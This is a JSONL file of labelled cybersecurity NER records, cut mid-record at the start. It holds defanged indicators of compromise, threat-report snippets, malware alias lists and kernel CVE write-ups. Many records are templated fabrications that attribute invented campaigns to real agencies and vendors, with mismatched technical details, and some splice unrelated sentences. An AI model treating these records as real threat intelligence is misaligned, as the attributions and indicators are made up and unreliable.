ab0f4d1f456f257fe6dce53c120f65d48393c9fdd6aebee8f6b191a6009ca746": [[415, 479]], "Indicator: 92.163.230.176": [[566, 586]]}, "info": {"id": "synth_v2_01010", "source": "defanged_augment"}}
{"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 172[.]15[.]241[.]58\n- 10 [ . ] 79 [ . ] 28 [ . ] 209\n- 99 [ . ] 224 [ . ] 222 [ . ] 104\n- backupupdate[.]tech\n- secure-sync[ . ]org\nURLs:\n- hxxp://gateway-cache[.]info/secure/token\n- hxxp://secure-node[.]club/api/v2/auth\nEmail Senders:\n- updates@urgent-notice[ . ]online\n- admin@auth-check[ . ]org\nFile Indicators:\n- SHA1: af3927f6fcab3290177351a4ad04408c0596b7ee\n- SHA1: 104137e6b283615d57085631a535fec195bc3d92\n- Drop path: C:\\ProgramData\\helper.sh", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 172.15.241.58": [[54, 73]], "Indicator: 10.79.28.209": [[76, 106]], "Indicator: 99.224.222.104": [[109, 141]], "Indicator: backupupdate.tech": [[144, 163]], "Indicator: secure-sync.org": [[166, 185]], "Indicator: hxxp://gateway-cache.info/secure/token": [[194, 234]], "Indicator: http://secure-node.club/api/v2/auth": [[237, 274]], "Indicator: updates@urgent-notice.online": [[292, 324]], "Indicator: admin@auth-check.org": [[327, 351]], "Indicator: af3927f6fcab3290177351a4ad04408c0596b7ee": [[377, 417]], "Indicator: 104137e6b283615d57085631a535fec195bc3d92": [[426, 466]]}, "info": {"id": "synth_v2_01500", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Virut.G W32/Trojan3.ATP W32[ . ]Virut[ . ]CF W32/Virut.BS Win32/Virut.17408 PE_VIRUX.A-3 Virus.Win32.Virut.ce Win32.Virut.AM Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.A-3 Heuristic.BehavesLike.Win32.ModifiedUPX.J Win32/Virut.bn Win32.Virut.nd.53248 Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan3.ATP Virus.Virut.06 Win32/Virut.NBP Win32.Obduran.a W32/Sality.AO", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[54, 74]]}, "info": {"id": "cyner2_train_002617", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/tunnel: wait until all sk_user_data reader finish before releasing the sock\n\nThere is a race condition in vxlan that when deleting a vxlan device\nduring receiving packets, there is a possibility that the sock is\nreleased after getting vxlan_sock vs from sk_user_data. Then in\nlater vxlan_ecn_decapsulate(), vxlan_get_sk_family() we will got\nNULL pointer dereference. e.g.\n\n   #0 [ffffa25ec6978a38] machine_kexec at ffffffff8c669757\n   #1 [ffffa25ec6978a90] __crash_kexec at ffffffff8c7c0a4d\n   #2 [ffffa25ec6978b58] crash_kexec at ffffffff8c7c1c48\n   #3 [ffffa25ec6978b60] oops_end at ffffffff8c627f2b\n   #4 [ffffa25ec6978b80] page_fault_oops at ffffffff8c678fcb\n   #5 [ffffa25ec6978bd8] exc_page_fault at ffffffff8d109542\n   #6 [ffffa25ec6978c00] asm_exc_page_fault at ffffffff8d200b62\n      [exception RIP: vxlan_ecn_decapsulate+0x3b]\n      RIP: ffffffffc1014e7b  RSP: ffffa25ec6978cb0  RFLAGS: 00010246\n      RAX: 0000000000000008  RBX: ffff8aa000888000  RCX: 0000000000000000\n      RDX: 000000000000000e  RSI: ffff8a9fc7ab803e  RDI: ffff8a9fd1168700\n      RBP: ffff8a9fc7ab803e   R8: 0000000000700000   R9: 00000000000010ae\n      R10: ffff8a9fcb748980  R11: 0000000000000000  R12: ffff8a9fd1168700\n      R13: ffff8aa000888000  R14: 00000000002a0000  R15: 00000000000010ae\n      ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018\n   #7 [ffffa25ec6978ce8] vxlan_rcv at ffffffffc10189cd [vxlan]\n   #8 [ffffa25ec6978d90] udp_queue_rcv_one_skb at ffffffff8cfb6507\n   #9 [ffffa25ec6978dc0] udp_unicast_rcv_skb at ffffffff8cfb6e45\n  #10 [ffffa25ec6978dc8] __udp4_lib_rcv at ffffffff8cfb8807\n  #11 [ffffa25ec6978e20] ip_protocol_deliver_rcu at ffffffff8cf76951\n  #12 [ffffa25ec6978e48] ip_local_deliver at ffffffff8cf76bde\n  #13 [ffffa25ec6978ea0] __netif_receive_skb_one_core at ffffffff8cecde9b\n  #14 [ffffa25ec6978ec8] process_backlog at ffffffff8cece139\n  #15 [ffffa25ec6978f00] __napi_poll at ffffffff8ceced1a\n  #16 [ffffa25ec6978f28] net_rx_action at ffffffff8cecf1f3\n  #17 [ffffa25ec6978fa0] __softirqentry_text_start at ffffffff8d4000ca\n  #18 [ffffa25ec6978ff0] do_softirq at ffffffff8c6fbdc3\n\nReproducer: hxxps://github[ . ]com/Mellanox/ovs-tests/blob/master/test-ovs-vxlan-remove-tunnel-during-traffic.sh\n\nFix this by waiting for all sk_user_data reader to finish before\nreleasing the sock.", "spans": {"Indicator: https://github.com/Mellanox/ovs-tests/blob/master/test-ovs-vxlan-remove-tunnel-during-traffic.sh": [[2179, 2279]], "System: Linux kernel": [[7, 19]], "Vulnerability: NULL pointer dereference": [[414, 438]], "Vulnerability: race condition": [[161, 175]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50405"}}
{"text": "A backdoor also known as: Trojan.BitMiner Trojan.Zusy.D41F53 Tool.BtcMine.1195 Backdoor.PePatch.Win32.108542 BehavesLike.Win32.Backdoor.th PUA.CoinMiner RiskTool[.]BitMiner[.]au RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Optiminz.A Unwanted/Win32.BitCoinMiner.R215923 Trj/CI.A Win32/Virus.RiskTool.435", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: RiskTool.BitMiner.au": [[153, 177]]}, "info": {"id": "cyner2_train_000174", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 99 [ . ] 125 [ . ] 186, the Symantec IR team identified AgentTesla running as C:\\Users\\Public\\Documents\\taskhost.exe. The threat actor, believed to be Turla, used PsExec for credential harvesting and Sharphound for lateral movement. Exfiltrated data was sent to login-update[.]top and auth-relay[.]dev. The initial dropper (MD5: 758fcc649322166d0904b50317ae0dd1) was delivered via a phishing email from security@secure-verify[ . ]net. A second C2 node was observed at 198 [ . ] 133 [ . ] 26 [ . ] 71, with a persistence mechanism writing to C:\\Windows\\System32\\agent.py.", "spans": {"Indicator: 172.99.125.186": [[64, 96]], "Organization: Symantec": [[102, 110]], "Malware: AgentTesla": [[130, 140]], "Indicator: login-update.top": [[336, 354]], "Indicator: auth-relay.dev": [[359, 375]], "Indicator: 758fcc649322166d0904b50317ae0dd1": [[403, 435]], "Indicator: security@secure-verify.net": [[477, 507]], "Indicator: 198.133.26.71": [[542, 573]]}, "info": {"id": "synth_v2_00382", "source": "defanged_augment"}}
{"text": "Blog Post by CISA: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-13087 against Palo Alto PAN-OS deployments. The initial access vector involves spear-phishing emails from notification@credential-check[.]site delivering PlugX. Post-compromise, the attackers deploy Amadey and use PowerShell Empire for reconnaissance. C2 infrastructure includes 185[.]66[.]198[.]205 and edgeproxy[.]tech. A staging server at hxxps://cloud-api[ . ]com/assets/js/payload.js hosts additional tooling. Key artifact: C:\\ProgramData\\backdoor.elf (SHA1: 9fed3db381c16e81ef3ec24c22be8d33a1bd50a7).", "spans": {"Organization: CISA": [[13, 17]], "Vulnerability: CVE-2025-13087": [[117, 131]], "System: Palo Alto PAN-OS": [[140, 156]], "Indicator: notification@credential-check.site": [[232, 268]], "Malware: PlugX": [[280, 285]], "Malware: Amadey": [[325, 331]], "Indicator: 185.66.198.205": [[405, 425]], "Indicator: edgeproxy.tech": [[430, 446]], "Indicator: https://cloud-api.com/assets/js/payload.js": [[468, 514]], "Indicator: 9fed3db381c16e81ef3ec24c22be8d33a1bd50a7": [[590, 630]]}, "info": {"id": "synth_v2_01525", "source": "defanged_augment"}}
{"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello[ . ]docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"Organization: government agencies": [[111, 130]], "Organization: biotechnology": [[151, 164]], "Organization: electronics manufacturing": [[167, 192]], "Organization: industrial chemistry": [[199, 219]], "Organization: WildFire": [[245, 253]], "Indicator: hello.docx": [[309, 323]], "Organization: Government": [[407, 417]]}, "info": {"id": "cyberner_stix_train_002274", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2024-26162 is a critical null pointer dereference affecting Active Directory. FBI confirmed active exploitation by BlackTech in the wild. Exploitation delivers DanaBot (MD5: 048040f2ed2095a33f0587d234824275) which is dropped to /dev/shm/backdoor.elf. The exploit payload is hosted at hxxp://storagecloud[.]tech/callback and communicates to 204 [ . ] 232 [ . ] 205 [ . ] 151 for C2.", "spans": {"Vulnerability: CVE-2024-26162": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Active Directory": [[88, 104]], "Organization: FBI": [[106, 109]], "Malware: DanaBot": [[188, 195]], "Indicator: 048040f2ed2095a33f0587d234824275": [[202, 234]], "Indicator: hxxp://storagecloud.tech/callback": [[312, 347]], "Indicator: 204.232.205.151": [[368, 401]]}, "info": {"id": "synth_v2_00820", "source": "defanged_augment"}}
{"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors “ msdeltemp[ . ]dll ” according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": {"Indicator: CE8B99DF8642C065B6AF43FDE1F786A3": [[24, 56]], "Indicator: msdeltemp.dll": [[82, 99]], "Malware: AZZY": [[195, 199]]}, "info": {"id": "cyberner_stix_train_002507", "source": "defanged_augment"}}
{"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . This file requires the target to attempt to open the [ . ]lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"Indicator: .lnk file": [[234, 247]], "System: Windows": [[280, 287]]}, "info": {"id": "cyberner_stix_train_004110", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Chisel artifacts at C:\\Users\\admin\\Desktop\\csrss.exe. Memory dump analysis confirmed execution of Ligolo. Registry modifications pointed to persistence via /opt/app/bin/lsass.dmp. Network forensics identified connections to 128[.]40[.]120[.]113 and gateway-data[ . ]cc. Email headers traced the initial vector to alert@account-update[ . ]xyz. File C:\\Users\\Public\\Documents\\implant.so (SHA256: 403bda1b5a63a0daa61c4dc0e67620662e09dd36ad7988bc99449fb97baf170d) was identified as the initial dropper. A staging URL hxxp://portalrelay[ . ]io/login resolved to 188[.]59[.]212[.]193. Secondary artifact hash: MD5: 63df7a51ded305d1a681b7aab547dfc5.", "spans": {"Indicator: 128.40.120.113": [[296, 316]], "Indicator: gateway-data.cc": [[321, 340]], "Indicator: alert@account-update.xyz": [[385, 413]], "Indicator: 403bda1b5a63a0daa61c4dc0e67620662e09dd36ad7988bc99449fb97baf170d": [[466, 530]], "Indicator: hxxp://portalrelay.io/login": [[585, 616]], "Indicator: 188.59.212.193": [[629, 649]], "Indicator: 63df7a51ded305d1a681b7aab547dfc5": [[681, 713]]}, "info": {"id": "synth_v2_01122", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: gup: stop abusing try_grab_folio\n\nA kernel warning was reported when pinning folio in CMA memory when\nlaunching SEV virtual machine.  The splat looks like:\n\n[  464.325306] WARNING: CPU: 13 PID: 6734 at mm/gup.c:1313 __get_user_pages+0x423/0x520\n[  464.325464] CPU: 13 PID: 6734 Comm: qemu-kvm Kdump: loaded Not tainted 6.6.33+ #6\n[  464.325477] RIP: 0010:__get_user_pages+0x423/0x520\n[  464.325515] Call Trace:\n[  464.325520]  <TASK>\n[  464.325523]  ? __get_user_pages+0x423/0x520\n[  464.325528]  ? __warn+0x81/0x130\n[  464.325536]  ? __get_user_pages+0x423/0x520\n[  464.325541]  ? report_bug+0x171/0x1a0\n[  464.325549]  ? handle_bug+0x3c/0x70\n[  464.325554]  ? exc_invalid_op+0x17/0x70\n[  464.325558]  ? asm_exc_invalid_op+0x1a/0x20\n[  464.325567]  ? __get_user_pages+0x423/0x520\n[  464.325575]  __gup_longterm_locked+0x212/0x7a0\n[  464.325583]  internal_get_user_pages_fast+0xfb/0x190\n[  464.325590]  pin_user_pages_fast+0x47/0x60\n[  464.325598]  sev_pin_memory+0xca/0x170 [kvm_amd]\n[  464.325616]  sev_mem_enc_register_region+0x81/0x130 [kvm_amd]\n\nPer the analysis done by yangge, when starting the SEV virtual machine, it\nwill call pin_user_pages_fast(..., FOLL_LONGTERM, ...) to pin the memory. \nBut the page is in CMA area, so fast GUP will fail then fallback to the\nslow path due to the longterm pinnalbe check in try_grab_folio().\n\nThe slow path will try to pin the pages then migrate them out of CMA area.\nBut the slow path also uses try_grab_folio() to pin the page, it will\nalso fail due to the same check then the above warning is triggered.\n\nIn addition, the try_grab_folio() is supposed to be used in fast path and\nit elevates folio refcount by using add ref unless zero.  We are guaranteed\nto have at least one stable reference in slow path, so the simple atomic add\ncould be used.  The performance difference should be trivial, but the\nmisuse may be confusing and misleading.\n\nRedefined try_grab_folio() to try_grab_folio_fast(), and try_grab_page()\nto try_grab_folio(), and use them in the proper paths.  This solves both\nthe abuse and the kernel warning.\n\nThe proper naming makes their usecase more clear and should prevent from\nabusing in the future.\n\npeterx said:\n\n: The user will see the pin fails, for gpu-slow it further triggers the WARN\n: right below that failure (as in the original report):\n: \n:         folio = try_grab_folio(page, page_increm - 1,\n:                                 foll_flags);\n:         if (WARN_ON_ONCE(!folio)) { <------------------------ here\n:                 /*\n:                         * Release the 1st page ref if the\n:                         * folio is problematic, fail hard.\n:                         */\n:                 gup_put_folio(page_folio(page), 1,\n:                                 foll_flags);\n:                 ret = -EFAULT;\n:                 goto out;\n:         }\n\n[1] hxxps://lore[ . ]kernel[ . ]org/linux-mm/1719478388-31917-1-git-send-email-yangge1116@126.com/\n\n[shy828301@gmail[.]com: fix implicit declaration of function try_grab_folio_fast]", "spans": {"Indicator: https://lore.kernel.org/linux-mm/1719478388-31917-1-git-send-email-yangge1116@126.com/": [[2915, 3009]], "Indicator: gmail.com": [[3022, 3033]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-44943"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com[ . ]mxi[ . ]videoplay ) .", "spans": {"Malware: slides": [[33, 39]], "Vulnerability: CVE-2017-8759": [[64, 77]], "Indicator: MXI Player": [[148, 158]], "Indicator: com.mxi.videoplay": [[288, 313]]}, "info": {"id": "cyberner_stix_train_006423", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Ryuk (MD5: bf20e740299d2a3d8f9f5c812bbb729d). Upon execution on VMware ESXi, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py and injects into legitimate processes. Network analysis shows beaconing to 176[.]51[.]207[.]206 every 60 seconds and DNS queries to secure-storage[.]org. The second stage was fetched from hxxp://relayupdate[.]online/callback and written to C:\\Program Files\\Common Files\\backdoor.elf. The payload uses LinPEAS-style techniques for defense evasion. A secondary hash (SHA256: 17dcd73e3f9841a7ab14221b4569821faae79d57b8bd038623abeeaea8cd8976) was extracted from the unpacked payload.", "spans": {"Malware: Ryuk": [[25, 29]], "Indicator: bf20e740299d2a3d8f9f5c812bbb729d": [[36, 68]], "System: VMware ESXi": [[89, 100]], "Indicator: 176.51.207.206": [[239, 259]], "Indicator: secure-storage.org": [[296, 316]], "Indicator: http://relayupdate.online/callback": [[352, 388]], "Indicator: 17dcd73e3f9841a7ab14221b4569821faae79d57b8bd038623abeeaea8cd8976": [[537, 601]]}, "info": {"id": "synth_v2_00459", "source": "defanged_augment"}}
{"text": "The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found : Additional features - SpyNote RAT could click photos using the device 's camera , based on commands from C & C . Group-IB experts established that the server 185[.]20[.]187[.]89 started functioning no later than 28 January 2019 . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"Malware: SpyNote RAT": [[27, 38], [126, 137]], "Organization: Group-IB": [[217, 225]], "Organization: banks": [[392, 397]], "Organization: e-payment": [[400, 409]], "Organization: financial institutions": [[422, 444]], "Malware: Carbanak": [[494, 502]], "Malware: Cobalt": [[507, 513]], "Indicator: 185.20.187.89": [[262, 281]]}, "info": {"id": "cyberner_stix_train_007808", "source": "defanged_augment"}}
{"text": "IOC Bulletin - FormBook Campaign:\nNetwork Indicators:\n- 102[.]22[.]89[.]57\n- 172[.]44[.]211[.]248\n- 87[.]11[.]214[.]196\n- sync-relay[ . ]tech\n- storagelogin[.]site\nURLs:\n- hxxp://data-portal[.]top/assets/js/payload.js\n- hxxps://login-relay[ . ]club/api/v2/auth\nEmail Senders:\n- admin@phishing-domain[.]com\n- it@identity-verify[.]cc\nFile Indicators:\n- MD5: 42dc4c381a108d36af9abc0ca1d81fdb\n- SHA256: 2c5ffb2bf5b6595d8385c5811c5bf4a41fadafbe0b1b3d9ff09bbb09e67a7c6c\n- Drop path: /dev/shm/update.dll", "spans": {"Malware: FormBook": [[15, 23]], "Indicator: 102.22.89.57": [[56, 74]], "Indicator: 172.44.211.248": [[77, 97]], "Indicator: 87.11.214.196": [[100, 119]], "Indicator: sync-relay.tech": [[122, 141]], "Indicator: storagelogin.site": [[144, 163]], "Indicator: http://data-portal.top/assets/js/payload.js": [[172, 217]], "Indicator: https://login-relay.club/api/v2/auth": [[220, 260]], "Indicator: admin@phishing-domain.com": [[278, 305]], "Indicator: it@identity-verify.cc": [[308, 331]], "Indicator: 42dc4c381a108d36af9abc0ca1d81fdb": [[356, 388]], "Indicator: 2c5ffb2bf5b6595d8385c5811c5bf4a41fadafbe0b1b3d9ff09bbb09e67a7c6c": [[399, 463]]}, "info": {"id": "synth_v2_01368", "source": "defanged_augment"}}
{"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au[.]su Homevideo2-12l[ . ]ml videohosting1-5j[ . ]gq URLs hxxp : //88.99.227 [ . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . It beacons to domain connect[.]bafunpda[.]xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"Indicator: connect.bafunpda.xyz": [[447, 471]], "Indicator: Facebook-photos-au.su": [[42, 65]], "Indicator: Homevideo2-12l.ml": [[66, 87]], "Indicator: videohosting1-5j.gq": [[88, 111]]}, "info": {"id": "cyberner_stix_train_007621", "source": "defanged_augment"}}
{"text": "] 230 [ . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m[.]php file . The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": {"Indicator: o402ek2m.php": [[238, 252]]}, "info": {"id": "cyberner_stix_train_002723", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: entry: fix ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n\nCurrently the ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD workaround isn't\nquite right, as it is supposed to be applied after the last explicit\nmemory access, but is immediately followed by an LDR.\n\nThe ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD workaround is used to\nhandle Cortex-A520 erratum 2966298 and Cortex-A510 erratum 3117295,\nwhich are described in:\n\n* hxxps://developer[.]arm[.]com/documentation/SDEN2444153/0600/?lang=en\n* hxxps://developer[.]arm[.]com/documentation/SDEN1873361/1600/?lang=en\n\nIn both cases the workaround is described as:\n\n| If pagetable isolation is disabled, the context switch logic in the\n| kernel can be updated to execute the following sequence on affected\n| cores before exiting to EL0, and after all explicit memory accesses:\n|\n| 1. A non-shareable TLBI to any context and/or address, including\n|    unused contexts or addresses, such as a `TLBI VALE1 Xzr`.\n|\n| 2. A DSB NSH to guarantee completion of the TLBI.\n\nThe important part being that the TLBI+DSB must be placed \"after all\nexplicit memory accesses\".\n\nUnfortunately, as-implemented, the TLBI+DSB is immediately followed by\nan LDR, as we have:\n\n| alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n| \ttlbi\tvale1, xzr\n| \tdsb\tnsh\n| alternative_else_nop_endif\n| alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0\n| \tldr\tlr, [sp, #S_LR]\n| \tadd\tsp, sp, #PT_REGS_SIZE\t\t// restore sp\n| \teret\n| alternative_else_nop_endif\n|\n| [ ... KPTI exception return path ... ]\n\nThis patch fixes this by reworking the logic to place the TLBI+DSB\nimmediately before the ERET, after all explicit memory accesses.\n\nThe ERET is currently in a separate alternative block, and alternatives\ncannot be nested. To account for this, the alternative block for\nARM64_UNMAP_KERNEL_AT_EL0 is replaced with a single alternative branch\nto skip the KPTI logic, with the new shape of the logic being:\n\n| alternative_insn \"b .L_skip_tramp_exit_\\@\", nop, ARM64_UNMAP_KERNEL_AT_EL0\n| \t[ ... KPTI exception return path ... ]\n| .L_skip_tramp_exit_\\@:\n|\n| \tldr\tlr, [sp, #S_LR]\n| \tadd\tsp, sp, #PT_REGS_SIZE\t\t// restore sp\n|\n| alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n| \ttlbi\tvale1, xzr\n| \tdsb\tnsh\n| alternative_else_nop_endif\n| \teret\n\nThe new structure means that the workaround is only applied when KPTI is\nnot in use; this is fine as noted in the documented implications of the\nerratum:\n\n| Pagetable isolation between EL0 and higher level ELs prevents the\n| issue from occurring.\n\n... and as per the workaround description quoted above, the workaround\nis only necessary \"If pagetable isolation is disabled\".", "spans": {"Indicator: https://developer.arm.com/documentation/SDEN2444153/0600/?lang=en": [[487, 556]], "Indicator: https://developer.arm.com/documentation/SDEN1873361/1600/?lang=en": [[559, 628]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-26670"}}
{"text": "spear phishing : 69[.]87[.]223[.]26 .", "spans": {"Indicator: 69.87.223.26": [[17, 35]]}, "info": {"id": "cyberner_stix_train_000448", "source": "defanged_augment"}}
{"text": "Blog Post by Rapid7: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-17296 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from confirm@auth-check[ . ]org delivering RemcosRAT. Post-compromise, the attackers deploy Gootloader and use Metasploit for reconnaissance. C2 infrastructure includes 124[.]66[.]181[.]251 and backup-cdn[.]org. A staging server at hxxps://edgestatic[ . ]club/login hosts additional tooling. Key artifact: /opt/app/bin/loader.exe (SHA1: 79c08e77f2ee94783432e33d9eb054e7e67d7960).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2020-17296": [[114, 128]], "System: Atlassian Confluence": [[137, 157]], "Indicator: confirm@auth-check.org": [[233, 259]], "Malware: RemcosRAT": [[271, 280]], "Malware: Gootloader": [[320, 330]], "Indicator: 124.66.181.251": [[397, 417]], "Indicator: backup-cdn.org": [[422, 438]], "Indicator: hxxps://edgestatic.club/login": [[460, 493]], "Indicator: 79c08e77f2ee94783432e33d9eb054e7e67d7960": [[565, 605]]}, "info": {"id": "synth_v2_01552", "source": "defanged_augment"}}
{"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8 [ . ] 26 [ . ] 21 [ . ] 117 srvhost[ . ]servehttp[ . ]com . The login , as mentioned above , was also designed to look legitimate .", "spans": {"Indicator: 8.26.21.117": [[356, 385]], "Indicator: srvhost.servehttp.com": [[386, 415]]}, "info": {"id": "cyberner_stix_train_001554", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2020-25247 is a critical use-after-free affecting MOVEit Transfer. Trend Micro confirmed active exploitation by Velvet Tempest in the wild. Exploitation delivers Hive (MD5: a2ee9f69463b7ec667c51354aeaab66d) which is dropped to /var/tmp/shell.php. The exploit payload is hosted at hxxps://portalcloud[ . ]top/collect and communicates to 77 [ . ] 18 [ . ] 225 [ . ] 248 for C2.", "spans": {"Vulnerability: CVE-2020-25247": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: MOVEit Transfer": [[78, 93]], "Organization: Trend Micro": [[95, 106]], "Malware: Hive": [[190, 194]], "Indicator: a2ee9f69463b7ec667c51354aeaab66d": [[201, 233]], "Indicator: https://portalcloud.top/collect": [[308, 343]], "Indicator: 77.18.225.248": [[364, 395]]}, "info": {"id": "synth_v2_00815", "source": "defanged_augment"}}
{"text": "x86: Speculative vulnerabilities with bare (non-shim) 32-bit PV guests 32-bit x86 PV guest kernels run in ring 1. At the time when Xen was developed, this area of the i386 architecture was rarely used, which is why Xen was able to use it to implement paravirtualisation, Xen's novel approach to virtualization. In AMD64, Xen had to use a different implementation approach, so Xen does not use ring 1 to support 64-bit guests. With the focus now being on 64-bit systems, and the availability of explicit hardware support for virtualization, fixing speculation issues in ring 1 is not a priority for processor companies. Indirect Branch Restricted Speculation (IBRS) is an architectural x86 extension put together to combat speculative execution sidechannel attacks, including Spectre v2. It was retrofitted in microcode to existing CPUs. For more details on Spectre v2, see: hxxp://xenbits[ . ]xen[ . ]org/xsa/advisory-254.html However, IBRS does not architecturally protect ring 0 from predictions learnt in ring 1. For more details, see: hxxps://software[ . ]intel[ . ]com/security-software-guidance/deep-dives/deep-dive-indirect-branch-restricted-speculation Similar situations may exist with other mitigations for other kinds of speculative execution attacks. The situation is quite likely to be similar for speculative execution attacks which have yet to be discovered, disclosed, or mitigated.", "spans": {"Indicator: http://xenbits.xen.org/xsa/advisory-254.html": [[874, 926]], "Indicator: https://software.intel.com/security-software-guidance/deep-dives/deep-dive-indirect-branch-restricted-speculation": [[1039, 1160]], "System: Xen": [[131, 134], [215, 218], [271, 274], [321, 324], [376, 379]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-28689"}}
{"text": "This Go written malware was observed during campaign of COBALT MIRAGE; it includes FRP (Fast Reverse Proxy) published by fatedier on GitHub (hxxps://github[.]com/fatedier/frp) and other projects additionally.", "spans": {"Indicator: https://github.com/fatedier/frp": [[141, 174]], "Organization: GitHub": [[133, 139]], "System: Go": [[5, 7]]}, "info": {"source": "defanged_augment", "name": "CobaltMirage FRP"}}
{"text": "CrowdStrike published a threat intelligence report linking Turla to a new campaign exploiting CVE-2022-24935 in Apache Struts. The attackers deployed Dridex via BITSAdmin, establishing C2 communication with 172 [ . ] 115 [ . ] 147 [ . ] 44 and sync-edge[.]live. A secondary payload was downloaded from hxxp://edgecdn[.]link/panel/index.html. The malware binary (SHA256: d0cd76fd9eb10f91e2d6848d7b8c166d9229c6424bde16adf0d25d164902bdc1) was dropped to C:\\Program Files\\Common Files\\taskhost.exe. Phishing emails were sent from helpdesk@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 145[.]253[.]57[.]147.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Vulnerability: CVE-2022-24935": [[94, 108]], "System: Apache Struts": [[112, 125]], "Malware: Dridex": [[150, 156]], "Indicator: 172.115.147.44": [[207, 239]], "Indicator: sync-edge.live": [[244, 260]], "Indicator: http://edgecdn.link/panel/index.html": [[302, 340]], "Indicator: d0cd76fd9eb10f91e2d6848d7b8c166d9229c6424bde16adf0d25d164902bdc1": [[370, 434]], "Indicator: helpdesk@mail-service.info": [[526, 554]], "Indicator: 145.253.57.147": [[620, 640]]}, "info": {"id": "synth_v2_00096", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Play (SHA1: f9ab81b8a8a2a712f8d6aa9ab0b0651eeb5c181a). Upon execution on Ubuntu 22.04, the sample creates /tmp/csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 10[.]107[.]101[.]34 every 60 seconds and DNS queries to relaycdn[ . ]top. The second stage was fetched from hxxps://datastatic[.]org/api/v2/auth and written to /home/user/.config/ntds.dit. The payload uses CrackMapExec-style techniques for defense evasion. A secondary hash (SHA256: 65842fb0c32b8b0ca4c7a6b9e2e473e919f21e7582a5c254dff3119425a9c9dc) was extracted from the unpacked payload.", "spans": {"Malware: Play": [[25, 29]], "Indicator: f9ab81b8a8a2a712f8d6aa9ab0b0651eeb5c181a": [[37, 77]], "System: Ubuntu 22.04": [[98, 110]], "Indicator: 10.107.101.34": [[221, 240]], "Indicator: relaycdn.top": [[277, 293]], "Indicator: hxxps://datastatic.org/api/v2/auth": [[329, 365]], "Indicator: 65842fb0c32b8b0ca4c7a6b9e2e473e919f21e7582a5c254dff3119425a9c9dc": [[504, 568]]}, "info": {"id": "synth_v2_00641", "source": "defanged_augment"}}
